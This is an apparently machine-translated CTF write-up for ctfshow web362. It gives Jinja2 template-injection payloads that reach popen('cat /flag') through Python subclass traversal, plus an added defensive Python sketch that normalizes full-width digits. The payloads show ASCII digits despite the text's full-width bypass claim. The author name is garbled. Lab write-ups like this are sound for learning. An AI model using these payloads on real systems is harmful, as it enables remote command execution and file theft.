ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_ sixty-two million ninety-four thousand eight hundred and fo】
?name={{"".__class__.__bases__[0].__subclasses__()}}
Up to this point everything is normal.
From 12 on, it didn't work at first.
The problem is with the digits; see the wp (writeup): use full-width digits instead of normal digits to bypass.
?name={{"".__class__.__bases__[0].__subclasses__()[132]}}
Then you should be able to do it in the normal way
?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
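Added example, not part of the original post: the page does not show the challenge's filter, so this sketch assumes it rejects ASCII digits 0-9 only. It shows why full-width digits pass such a check and how normalizing to NFKC before checking closes the gap; all function names and sample strings are constructed for illustration.

```python
import re
import unicodedata

# Assumption: the filter is an ASCII-only digit blacklist (not shown on the page).
ASCII_DIGITS = re.compile(r"[0-9]")


def naive_filter_blocks(value: str) -> bool:
    """True when the ASCII-only blacklist would reject the input."""
    return ASCII_DIGITS.search(value) is not None


def hardened_filter_blocks(value: str) -> bool:
    """Fold compatibility forms with NFKC, then reject any decimal digit.

    NFKC maps full-width digits (U+FF10..U+FF19) and superscripts to ASCII;
    isdecimal() also catches digits from other scripts that NFKC leaves alone.
    """
    folded = unicodedata.normalize("NFKC", value)
    return any(ch.isdecimal() for ch in folded)


def find_non_ascii_digits(value: str):
    """Return (index, Unicode name, numeric value) for each non-ASCII digit.

    Useful as a detection signal: legitimate 'name' values rarely need these.
    """
    return [
        (i, unicodedata.name(ch), unicodedata.digit(ch))
        for i, ch in enumerate(value)
        if ch.isdecimal() and not ch.isascii()
    ]


if __name__ == "__main__":
    # Constructed samples: an index written with ASCII and with full-width digits.
    for sample in ("[132]", "[\uff11\uff13\uff12]", "alice"):
        print(
            repr(sample),
            "naive blocks:", naive_filter_blocks(sample),
            "hardened blocks:", hardened_filter_blocks(sample),
            "non-ascii digits:", find_non_ascii_digits(sample),
        )
    # Python itself reads full-width digits as numbers, which is why a
    # blacklist has to work on the normalized form.
    print(int("\uff11\uff13\uff12"))
```

A digit blacklist is only one layer; the underlying fix for SSTI is to never build the template from user input and to pass the value as a template variable instead.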
Copyright notice
This article was written by [m0_ sixty-two million ninety-four thousand eight hundred and fo]; please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/04/202204231829007951.html